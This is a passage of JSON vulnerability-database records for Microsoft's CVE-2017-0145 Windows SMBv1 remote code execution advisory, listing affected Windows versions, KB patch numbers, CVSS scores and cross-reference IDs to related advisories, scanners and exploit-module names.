{"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T04:47:39", "differentElements": ["msAffectedSoftware"], "edition": 68}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-20T06:50:12", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012606", "KB3212646", "KB3210721", "KB3205401", "KB4014077", "KB4012216", "KB4013198", "KB3213986", "KB4012214", "KB4012217", "KB4013429", "KBMS16-110, 3187754", "KB3210720", "KB3177186", "KB4012212", "KB4012215", "KB4012598", "KB4012213", "KB3205409"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T06:50:12", "differentElements": ["msAffectedSoftware"], "edition": 69}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "4b3c58a0de4c835f521b07a7a1b9b647", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-20T08:45:23", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KBMS16-110, 3187754", "KB3212646", "KB4014077", "KB3210721", "KB4012598", "KB4013198", "KB4012215", "KB3205401", "KB4012606", "KB4012213", "KB3213986", "KB4012216", "KB4012217", "KB3210720", "KB4012212", "KB4012214", "KB3205409", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": 